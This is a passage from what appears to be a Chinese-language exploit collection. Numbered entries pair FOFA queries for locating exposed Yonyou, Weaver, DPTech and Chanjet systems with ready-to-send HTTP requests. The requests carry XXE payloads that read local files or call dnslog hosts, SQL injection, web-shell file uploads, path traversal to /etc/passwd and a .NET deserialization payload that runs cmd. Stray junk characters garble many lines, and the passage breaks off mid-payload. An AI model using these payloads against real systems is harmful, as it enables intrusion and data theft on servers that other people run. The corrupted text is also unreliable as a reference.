- i* u# h' F: R5 w2 `6 JUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info; |# ]* z- k+ {# E' {5 G& I
Accept-Encoding: gzip, deflate( n: y, X6 P9 @
Accept: */*
% B. k7 K; d8 t! Z5 \( Z- ~0 qConnection: close9 Q; b) M4 t6 `! g
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA2 h( C# {0 u. N
Content-Length: 190
. f) F& Q' h/ z6 L/ t) c/ dContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
5 h3 R) C4 \" J4 y- S9 P8 P3 z# I3 y, b0 L! `/ U9 _: o* |
--fd28cb44e829ed1c197ec3bc71748df0
* Y1 q) x( s, I. |Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
% p3 f4 r* s6 o' {: v" e8 q1 H* l, B7 c2 P: ^) y0 o
<%out.println(1111*1111);%>
$ ^4 V. w1 Y' S- A/ p--fd28cb44e829ed1c197ec3bc71748df0--" p }, L/ s2 N/ @. z
0 L; |/ r. _' g J7 V
2 ~9 J+ S' O' U8 @# H: u: d) ?36. 用友NC-Cloud soapFormat XXE- }. v: a4 v+ N: e6 a0 h% g0 c. o
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
6 h$ w0 s( t, `, x, ^$ {POST /uapws/soapFormat.ajax HTTP/1.1; T' z$ p# x) }. x* t; D+ P2 _0 G
Host: 192.168.40.130:8989
! |" h4 ^" e8 y" Z5 K4 d& ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.05 t6 n! h! G* J2 D/ |
Content-Length: 263
9 M3 u. e& ~" P' ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 L8 b9 Y* v( ]2 e- FAccept-Encoding: gzip, deflate
4 a9 g5 [, M6 K# }$ h; D' M [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, U! O$ k" J; L. t- J& I5 h. R
Connection: close8 f! K5 n6 k6 F( a9 w
Content-Type: application/x-www-form-urlencoded
- d& }# B2 r2 K; K+ n9 o; k9 Y- D' d" f, ~Upgrade-Insecure-Requests: 1; q A* v8 T5 `1 I+ a) x
8 s, p+ r1 k, v! _9 v
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a+ W1 U9 _7 O. |( E+ E
; ]7 h6 j. s5 R, Y0 A
# [# T# M% b: `8 ?+ b; F& b+ ?37. 用友NC-Cloud IUpdateService XXE
- D2 z8 E; ]9 WFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/". c5 C( J! r+ E! E; O4 y
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.19 M7 V1 `) Z7 Y) T: Q
Host: 192.168.40.130:8989 E- G4 L! L9 X5 _, p1 C8 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36* r' V% e# V6 s: d$ g; P/ i, ^& g
Content-Length: 421
0 k% Q8 T% \' eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
; D3 x5 K& K% U* k e- V/ c( iAccept-Encoding: gzip, deflate( g' z/ Q1 {; }* K
Accept-Language: zh-CN,zh;q=0.9
& v+ B7 v5 U: v4 r$ t$ Y% ? }Connection: close
+ i4 M- q0 p+ VContent-Type: text/xml;charset=UTF-8$ S; m3 u4 a( V5 v
SOAPAction: urn:getResult
8 v% M! s2 ?2 s( [* P7 xUpgrade-Insecure-Requests: 1' G% z# v' x; u
$ N/ }0 ?. G0 m+ U0 p3 z3 C% a# s
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">6 @1 g! A, x P- v' ?* W
<soapenv:Header/>5 q$ k, ], Y' m3 m* I) f. ?$ h) o
<soapenv:Body>
, {- |1 f- T3 `+ B<iup:getResult>
, n8 O* F& C1 h+ u$ n" y |<!--type: string-->- k- A6 N5 j* k% q' ~+ R
<iup:string><![CDATA[
( i; E+ n' A. {. G2 T<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>3 M0 _& Z! A4 h+ ^+ R
<xxx/>]]></iup:string>
# F/ g O! G* e0 s</iup:getResult>- t3 D* `+ ~9 @% s* j5 F0 u/ z
</soapenv:Body>; R3 P3 H2 e4 l% N( s7 g6 `
</soapenv:Envelope>' e8 |) ^4 W2 S* @' j
) i# a3 G8 d, e, a" x$ A
& `2 Y4 e$ h# T# V
# ^% X/ i1 n5 {* {38. 用友U8 Cloud smartweb2.RPC.d XXE
: S3 W% j7 I$ E( j3 CFOFA:app="用友-U8-Cloud"
; o7 f3 O+ I/ ?POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
( o8 y/ X( g3 kHost: 192.168.40.131:8088
% G+ p {8 z4 [9 K9 Q, {( ]$ wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.253 }# s+ C% m; ]$ I$ N' W
Content-Length: 260! Z+ R& K) L, r9 V, Q) P2 Z$ W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3$ V1 G E2 h, w/ a5 k, f- v# w% P
Accept-Encoding: gzip, deflate" c0 S! V. j8 T" ~0 R
Accept-Language: zh-CN,zh;q=0.9# x: M4 U$ L/ |4 I+ C
Connection: close
! U0 @$ Q* A6 ]+ P. A0 oContent-Type: application/x-www-form-urlencoded
6 K) \& h- z. ]
9 k& S N4 N) U; m4 B1 ~* }- u__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
+ _6 `9 x6 f* V: ?$ v- H: P+ w( o0 U1 Q& j: k
% b+ \ ?; t( {7 @. W( u# ?
39. 用友U8 Cloud RegisterServlet SQL注入
0 H. f+ g# Q7 tFOFA:title="u8c"& @9 R( u0 w2 x% L% ]
POST /servlet/RegisterServlet HTTP/1.1
' J' t$ f4 L. qHost: 192.168.86.128:8089& B( ]# \0 U4 X I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
! b3 ^ F" Y. s* C4 {2 T& @Connection: close( z @8 K+ M7 ]: O8 r
Content-Length: 85
$ m! d% X( f( d% P I8 \1 O' W# bAccept: */*. i8 k4 U8 m) m$ O% O: q
Accept-Language: en
7 r- {& i& d3 x$ ~8 P7 |% H' b; E0 \Content-Type: application/x-www-form-urlencoded8 e3 T6 F* E& I) R' E6 Z$ x/ b
X-Forwarded-For: 127.0.0.1
/ t4 t0 c. X. V- o, q, ^/ sAccept-Encoding: gzip# ]5 A k; L. U, G+ S1 @
; R- o* u# `+ N9 ^. F5 u lusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--) [. w' F5 L- A, }5 Z
4 V `. X0 H7 D
0 a) j4 Y6 k) F8 Y1 p40. 用友U8-Cloud XChangeServlet XXE
* s- t: \+ i' o/ i0 {% u" JFOFA:app="用友-U8-Cloud"+ s% p% b' u# b
POST /service/XChangeServlet HTTP/1.1
0 }1 ~6 h- Y" u3 N" C8 M0 [Host: x.x.x.x
$ `1 H! N- D9 P. ?User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.362 N. f3 s B) L1 q& ~
Content-Type: text/xml
+ ^1 }5 L. E l# C4 o9 y, h" g# QConnection: close
9 [+ n7 g& W4 G) e" W" R2 P8 x! W% |% |
/ g" t% G5 E; c: w% S; a3 X<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
: P. g/ L& {. I2 P% I4 g `9 @0 r( x- V* i# x$ o( o
- k2 u" e$ o' d9 h" R1 U
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入. A2 H: r* l8 z- e K4 J
FOFA:app="用友-U8-Cloud"
. Q/ R8 s) W0 m+ C. G9 l9 LGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1) g0 T) U; Y1 v4 F5 w4 U! Z
Host:% [8 Q" E7 _7 Z0 A: S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" U+ g& w7 ]$ D9 l5 W8 f
Content-Type: application/json
3 A4 B- h6 r1 M9 ~1 _; zAccept-Encoding: gzip
+ c3 s) A1 ?- e& K. W1 r/ R" fConnection: close
. Q; f! e( {: [' v! X O8 r+ w% R
/ \4 m0 M7 C5 @" L% p/ \0 u* F% y" T9 C- d& F. R* w/ S
42. 用友GRP-U8 SmartUpload01 文件上传4 q7 w% I# ]4 u3 M
FOFA:app="用友-GRP-U8"/ c! M$ p( |5 k& o, V
POST /u8qx/SmartUpload01.jsp HTTP/1.1
: `0 _8 O: H8 A. eHost: x.x.x.x$ ^4 @) F; e! ]0 L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt/ Z6 d \) d9 X2 J6 ^* ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 B7 N" r5 h% ?! a4 J: ?/ ]( n/ j
2 Q9 H8 L6 ~8 j; @+ z
PAYLOAD
5 x% z# ]7 `) j, F8 S% t6 M2 Q2 j0 Q8 l+ B* l
( R9 `2 }' F# [5 Z, t" S! M1 @. uhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml) {7 M) C6 m! c9 T
- c0 s9 s+ r& s, d' S& \7 y3 D% D
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
# C1 l3 {% f( ^. C& cFOFA:app="用友-GRP-U8". r2 D- S9 [$ Q. z' E) _. `" \
POST /services/userInfoWeb HTTP/1.1
, Y3 `, Y6 T7 K- n: R+ _Host: your-ip
B, x! g7 V. O1 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# |0 V# g" g! J& x/ J5 f" kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ l6 ?# v2 u' D$ d* `Accept-Encoding: gzip, deflate6 v) V& i3 W; K4 O0 s: j
Accept-Language: zh-CN,zh;q=0.99 O2 j7 _4 u s1 u; j8 W+ A$ w
Connection: close
* S9 Q7 {8 w% O7 z' k8 XSOAPAction:' M; k4 E, @0 R3 }' m
Content-Type: text/xml;charset=UTF-8/ e/ {4 Q' ?# s% J7 g" ?$ E" S1 q
* h0 P. E1 M9 a/ S, o3 F/ n! b
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">' N d: V2 M1 w
<soapenv:Header/>
1 z( g- t, Y( A6 j <soapenv:Body>- i0 k; E! n2 i4 G" v& V
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> Q) s5 E. ?* U# q
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
; J; [5 l$ c! w+ @: l2 O0 ` h </ser:getUserNameById>
4 `& D6 b# Z9 {7 A+ b </soapenv:Body>
& Z: j6 ~' Z. R* c</soapenv:Envelope>
. z; I& H1 ?2 ~ \1 C. ^
& v$ R2 g+ }5 a
) `" w: Z( y- d4 j8 d8 t6 o44. 用友GRP-U8 bx_dj_check.jsp SQL注入6 ]6 E* r" k; I3 U) C
FOFA:app="用友-GRP-U8"
* _2 }# n$ ]: ?# ?2 E5 k1 z: rGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1- E5 M- D8 D" Q+ @9 D7 v/ [* |& Q- ~
Host: your-ip3 X7 M7 i/ ^( _9 Q( l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
) B. D% _, d6 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 F6 M' L9 s% F; j4 z1 N' u! z& s& R
Accept-Encoding: gzip, deflate
7 O" J/ j ?9 ^2 p' A. @: DAccept-Language: zh-CN,zh;q=0.9+ q8 y4 p5 W" W- @
Connection: close
7 ]" J N B" {, a+ j
3 B/ ]' Q; i8 f% Y
) J+ N# y, S2 s/ }45. 用友GRP-U8 ufgovbank XXE
4 f2 v- q# O# V! H/ C+ S$ a& fFOFA:app="用友-GRP-U8"* |, m& P7 n+ z1 }' N% c! e
POST /ufgovbank HTTP/1.1. V; D+ L4 L' a& ]# H: P, z3 |& ?6 L
Host: 192.168.40.130:222! x" K, j1 D4 C1 u; T2 }' G' i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
6 e* l$ ?- q5 j$ G" h% ~Connection: close, }1 t' a6 f3 Y R: w: _; `
Content-Length: 161: O/ F9 j& k: J% c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. n& r4 ^, U# d. y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* M- Z! ^( m8 o1 u9 T
Content-Type: application/x-www-form-urlencoded
% t+ s `" Z. ]* L; ^; SAccept-Encoding: gzip
6 a* i) q' A6 f
0 p: b# ]/ U1 ?3 E% N, TreqData=<?xml version="1.0"?>- z0 \3 |. N- T0 x2 C
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest- C# g1 N( M; p
2 c, F7 k9 s3 n+ Y
) N2 D+ X# A. z% o4 v; g46. 用友GRP-U8 sqcxIndex.jsp SQL注入
2 R3 ] X& D: vFOFA:app="用友-GRP-U8"
" h" ] |- ]( W# pGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
5 @; N( S5 j1 [3 p8 gHost: your-ip2 f# S# H# B" P9 b" S; X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
& Q% W1 p1 |( d) O) RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 k; l, X" V) C; |* w' g. ~/ QAccept-Encoding: gzip, deflate
. M$ d* @! j) T* T/ @. G" u1 IAccept-Language: zh-CN,zh;q=0.9
$ t1 Q; a [4 e; `Connection: close; ~# d. R, J- X3 e: n
/ t% Q% I+ p4 c* q/ u' s
$ ]* [0 p& |) X! k7 T- y
47. 用友GRP A++Cloud 政府财务云 任意文件读取3 g+ @ V! q% k* `' T
FOFA:body="/pf/portal/login/css/fonts/style.css"
. @4 q0 @0 u/ p2 cGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
" q6 H! S; c& O- S+ `Host: x.x.x.x
- `7 k- M3 A" \1 DCache-Control: max-age=0% G/ W5 t3 b* f; m
Upgrade-Insecure-Requests: 1( o5 W% [7 q- ^5 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- E; @' L3 p% q. P- T8 ^+ q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" G4 h: X% L% j0 z
Accept-Encoding: gzip, deflate, br
U) z8 {; J7 p5 nAccept-Language: zh-CN,zh;q=0.91 c2 B2 }/ n7 o7 @2 s4 G' B2 ?
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
( L1 V! W$ N. f! J! rConnection: close
" |- ]) c6 m4 n6 O; t0 ]8 e+ O. B. [+ O
) o" d3 z }5 U! [: r
$ X5 s. X, n) {/ k9 }' R) u0 M48. 用友U8 CRM swfupload 任意文件上传- ^% T4 f( A( @ \3 B E
FOFA:title="用友U8CRM"; e4 Q @- m8 E0 ]8 H! ?
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
9 C* F( q. \; E1 @- lHost: your-ip
( W1 _9 {( d. f) j. H& _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) R' T# N1 |5 |$ f, l! ~! qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 y; e( t4 u9 j! v4 O! K) w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ D6 }. p% A ?$ ^: N! g! Q
Accept-Encoding: gzip, deflate4 h- [" P# b& s- t1 ?% Z
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668559 V# e/ A- f) V7 j
------269520967239406871642430066855
/ @$ `: j% O& iContent-Disposition: form-data; name="file"; filename="s.php", @0 Y' m" v Y$ c8 L5 d! p
1231
$ r) h) X& l; x: x0 X" B$ y, D+ a' iContent-Type: application/octet-stream
0 B9 H8 C1 z; ^6 K------269520967239406871642430066855
) v- |2 a7 T; L9 D. |Content-Disposition: form-data; name="upload"/ L: n7 S8 K6 V3 R7 X& y
upload r4 s8 g4 {1 f0 l
------269520967239406871642430066855--
' ]6 z" V% R- m5 F. K- e% m. y3 S; S& z1 s
& ]8 e, i% `0 q/ E49. 用友U8 CRM系统uploadfile.php接口任意文件上传
$ B/ L4 i3 W: T1 \+ a, `! CFOFA:body="用友U8CRM"4 H$ }8 r: p7 F. e) _
* r. g, e) z* |0 q1 a1 \POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
/ ^) N0 H8 q4 d) RHost: x.x.x.x
9 |0 i, B j4 U6 ^+ eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& n1 l0 ?" A$ `& |8 ZContent-Length: 329
# S/ Q3 a* v. t9 L, N9 L( h' J# ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# Z& |6 C* Y1 }) l% y! YAccept-Encoding: gzip, deflate
r H6 {4 S3 S9 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 L# a ~& @4 M2 @0 J
Connection: close: }# @% s/ E* t+ h! n
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w" V2 L8 N0 ~0 v& P% E) U' @
( w' C o0 l$ z2 l, j-----------------------------vvv3wdayqv3yppdxvn3w: _; u9 N0 J; [
Content-Disposition: form-data; name="file"; filename="%s.php "
" W) ^( _* V5 ^1 g5 D FContent-Type: application/octet-stream
) M7 f u0 A8 R) L
. B/ m- C; |9 V+ r5 C4 N) J5 zwersqqmlumloqa
# }& c8 n4 B4 ^! X: y-----------------------------vvv3wdayqv3yppdxvn3w
% y9 _# J$ C# M- K- zContent-Disposition: form-data; name="upload"
/ ^' E$ Q6 r; L7 C9 p2 ]
5 ]. R. b8 r; ?upload2 H- r c) X2 C
-----------------------------vvv3wdayqv3yppdxvn3w--
7 O$ I; H2 l6 {
& F" p/ W" J. d' I% t3 |# R0 s9 h; u! e- W" d: X
http://x.x.x.x/tmpfile/updB3CB.tmp.php
3 k% ^% q3 U' B8 Y
1 s: Q y" ?$ e50. QDocs Smart School 6.4.1 filterRecords SQL注入$ T$ `& [; B- A ^8 v
FOFA:body="close closebtnmodal"# M' z5 J( P. P
POST /course/filterRecords/ HTTP/1.1) W/ O* \8 z8 O' B: _
Host: x.x.x.x
6 k- K' r) q BUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36$ m9 S0 }& o0 ~
Connection: close
. ~3 ?# u8 l: X0 {5 GContent-Length: 224
, X( k* E( r% m1 l& b. `8 R J% PAccept: */*1 N' g6 G9 V' M4 ~: J2 m8 f
Accept-Language: en4 N- _: V) P: K8 Q: e! q8 p
Content-Type: application/x-www-form-urlencoded' A z6 k/ @/ i4 Z7 q
Accept-Encoding: gzip
: {3 H) V5 f3 d: F5 w
/ t% C2 W; [2 g) n! p& p3 Dsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
( K4 |; P8 r; Y3 n/ o& H
1 j. V( I! j7 M. @6 q& f& D) G% c: f+ Q% e& g4 B5 l* |" Y
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入# F3 x) q0 m: y. S
FOFA:app="云时空社会化商业ERP系统"9 T, z' C% d5 H9 P+ m
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.13 ?8 v% K3 k2 i) D
Host: your-ip
4 k$ z1 w6 t9 o$ o8 I& CUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
. k x8 d2 E+ b" \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: N* I1 u- e" G$ k L' YAccept-Encoding: gzip, deflate
4 K5 D2 J8 v/ QAccept-Language: zh-CN,zh;q=0.9
) B5 U+ s1 X3 z- \( ]; VConnection: close0 o8 ^* I0 \! g6 e
2 q# l" m! o6 z) g) n* u5 p7 L5 |( s* L# ~4 k3 V9 X
52. 泛微E-Office json_common.php sql注入
& }/ B' O. n1 w$ qFOFA:app="泛微-EOffice"3 H* V3 h$ R! }! c
POST /building/json_common.php HTTP/1.1
' F) Q8 i- Y8 jHost: 192.168.86.128:8097
5 _% f1 K: I3 t" FUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& _2 O" f9 S }5 y9 J# t
Connection: close8 h% y) R& N/ U, d6 O$ g
Content-Length: 87. t$ X5 s' P4 j6 |
Accept: */*: b; r- A) ]; D' Y* B4 b
Accept-Language: en V% J1 A3 t" s$ s5 q1 o
Content-Type: application/x-www-form-urlencoded
$ ]7 X+ H& m6 f( _Accept-Encoding: gzip
h8 q0 V) P, |+ a6 ~( f; G6 j* p' ?* \& @" l9 r
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
: \# v2 f f; D! a1 W
1 p9 t& k' L" b9 L2 a4 c( v" w' w& B" k% l& e
53. 迪普 DPTech VPN Service 任意文件上传
1 r! @( X* i. U& E# ?- _6 e; kFOFA:app="DPtech-SSLVPN"
! f. Q* M9 L9 f/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
2 W* U* h% N. f% |+ E# a( u+ X
2 |1 m3 A) }% v4 M( |# j+ b' X
; M M' h- c$ Q54. 畅捷通T+ getstorewarehousebystore 远程代码执行
0 B! z7 b4 }4 O& w/ CFOFA:app="畅捷通-TPlus"
3 E' c# k& |) d" @9 w* E( d- s第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
/ C- z' O' S2 [5 e+ {7 a# C) S"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
, z7 H" O5 y; G& R& ^8 C5 Y/ @0 p' K# M
. f; R Y# a9 P6 h
完整数据包' a( X3 t4 ~1 t4 T
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
& V# V: p6 f# M1 ]3 Y$ Y7 ?% Z& VHost: x.x.x.x" M7 r- C2 c& s* l- T1 }' Q+ m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
; ]* X' [. l/ n% W2 pContent-Length: 593
9 _1 e% n+ C+ H% I4 W$ u0 N- k4 Y4 F$ Z' p( h; A
{
+ a5 M! m/ K$ D$ i"storeID":{
$ \% s; X- A8 {9 Y9 q "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",6 Y0 m3 l! p) W, J' O6 X
"MethodName":"Start",
# T& X2 Y O4 n- ~4 e) Y" M "ObjectInstance":{2 U5 u# {9 q7 t& f4 @
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
8 K0 G) b! _( s) k "StartInfo":{) I% ? w5 V T9 s* `/ ?4 }& ?5 h
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
/ M( I" V) T- s a" F0 a1 n: { "FileName":"cmd",
, M* i7 _0 @" V' h+ ^+ x "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
( q( B$ p5 m$ a' s }1 n3 P* A5 s9 ]) z
}
0 I: X: h. C+ Q @# E, N. c }
3 [# O6 F9 B5 R3 L7 q}" N7 |- d7 V8 s% k c) ~7 ] P/ {
2 {: ~% E4 E: U+ v' A# f- p" }# L
% n) v1 ]5 D' w4 Z第二步,访问如下url. q9 s1 j+ A. ]9 \
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt5 |3 A+ V4 {0 y, Y8 E
3 p; g! {" ~2 E8 n: u! g3 B% @# i
5 [+ p" C/ _" h8 l* X& d3 N
55. 畅捷通T+ getdecallusers信息泄露
O- D3 z; C3 T. h# `$ RFOFA:app="畅捷通-TPlus"
5 t" h9 u+ x( X第一步,通过
: \# q9 z) } P( L3 F( ^& e& i, q$ o/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
- E7 Y" U- j5 G% n. p2 h0 J' M第二步,利用获取到的Cookie请求3 p O" b1 ]0 i0 }8 D2 V7 f
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
% I/ @7 l, R: d# R: ~" p- Z3 |- I* J! ^" R
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE) X& y* ?$ w, V7 c, P- V
FOFA: app="畅捷通-TPlus"
$ v7 k! \& K M# R: a) hPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
) M9 T8 m h& a3 G3 MHost: x.x.x.x8 @' p) w" x: ^! Z- n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
" }. k k, G" f/ N- OContent-Type: application/json$ p' c% K4 ^( B( M% ?2 R( x
) @; w4 u5 U( _) F0 k) s+ Z
{& q7 k5 {, I( A0 Y- n/ ]6 e; I, v$ A6 G
"storeID":{
